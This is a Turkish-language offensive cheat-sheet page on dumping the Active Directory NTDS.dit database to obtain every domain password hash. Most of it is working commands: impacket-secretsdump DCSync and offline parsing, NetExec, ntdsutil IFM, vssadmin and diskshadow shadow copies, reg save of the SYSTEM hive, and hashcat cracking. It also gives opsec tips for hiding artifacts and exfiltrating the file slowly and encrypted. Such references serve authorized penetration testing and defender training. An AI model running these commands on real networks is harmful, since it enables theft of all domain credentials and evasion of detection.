NTDS.dit Çıkarma
ATT&CK T1003.003 tüm domain hash'leri
ATT&CK T1003.003 tüm domain hash’leri
NTDS.dit, domain’deki tüm hesapların parola hash’lerini (ve nesne verisini) barındıran Active Directory veritabanıdır. Bir Domain Controller üzerinde yeterli yetkiyle bu veritabanı + SYSTEM hive (boot key) çıkarılırsa, tüm domain kimlikleri offline çözülür.
Pratikte çoğu angajmanda aynı sonuç DCSync ile ağ üzerinden alınır; NTDS yolu DC’de dosya erişimi / VSS gerektiğinde veya DRSUAPI kısıtlıysa kullanılır.
Komut üreteci
Section titled “Komut üreteci”NTDS · secretsdump LOCAL
embedded toolimpacket-secretsdump -ntds NTDS.dit -system SYSTEM LOCALNTDS · secretsdump LOCAL
Section titled “NTDS · secretsdump LOCAL”Ön koşullar
Section titled “Ön koşullar”- DC’de admin eşdeğeri (DA, local admin on DC, veya Backup Operators + uygun teknik).
- Diskte kilitli NTDS.dit → Volume Shadow Copy / ntdsutil IFM / diskshadow ile kopya.
- Offline parse için SYSTEM hive (boot key).
Yöntemler
Section titled “Yöntemler”-
DCSync (uzaktan, dosyaya dokunmadan) — tercih edilen: Ayrıntı: DCSync .
Terminal window impacket-secretsdump -just-dc domain.local/admin:'Pass'@DCTerminal window impacket-secretsdump -just-dc-ntlm domain.local/admin:'Pass'@DCTerminal window nxc smb DC -u admin -p 'Pass' --ntds -
ntdsutil IFM (Installation From Media) — temiz, desteklenen yol:
ntdsutilactivate instance ntdsifmcreate full C:\temp\ifmquitquit -
VSS / vssadmin / diskshadow :
vssadmin create shadow /for=C:# Shadow yolunu not et, örn. \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.ditreg save HKLM\SYSTEM C:\temp\SYSTEM# diskshadow script (örnek)set context persistent nowritersadd volume c: alias vsscreateexpose %vss% z: -
impacket / NetExec uzaktan VSS :
Terminal window impacket-secretsdump domain.local/admin:'Pass'@DC -use-vssTerminal window nxc smb DC -u admin -p 'Pass' --ntds vss -
Offline çöz :
Terminal window impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCALTerminal window impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL -outputfile domainTerminal window impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL -history
Backup Operators yolu
Section titled “Backup Operators yolu”Backup Operators üyesi SeBackup ile dosyaları ACL’ye bakmadan okuyabilir:
Bu grup sıkça “yüksek ama DA değil” yolu olarak BloodHound’da görünür.
Çıktı kullanımı
Section titled “Çıktı kullanımı”krbtgt → Golden TicketAdministrator → PtHtüm NTLM → crack (hashcat -m 1000) / password reusemachine accounts → Silver Tickethashcat -m 1000 ntlm.hashes rockyou.txtOpsec (ofansif)
Section titled “Opsec (ofansif)”- IFM/VSS diskte büyük artefakt bırakır — iş bitince sil ( ntds.dit , shadow, IFM klasörü).
- DCSync genelde daha az disk izi bırakır; VSS event’leri (VSSVC) belirgindir.
- ntds.dit exfil boyutu büyük — sıkıştır, şifrele, yavaş kanal.
- Production DC’de shadow create I/O spike yaratabilir — pencere seç.
Yaygın tuzaklar
Section titled “Yaygın tuzaklar”- Sadece ntds.dit alıp SYSTEM unutmak → boot key yok, parse fail.
- Eski shadow yolu kopyalarken path escape ( \?\GLOBALROOT... ) hatası.
- secretsdump LOCAL modunda dosya yolları yanlış cwd.
- Esentutl / dirty shutdown → esentutl /p ntds.dit ile repair (lab).
- RODC NTDS farklı secret seti içerir — RWDC tercih et.
Sonraki adımlar
Section titled “Sonraki adımlar”DCSync · Golden Ticket · Pass-the-Hash · LSASS Dumping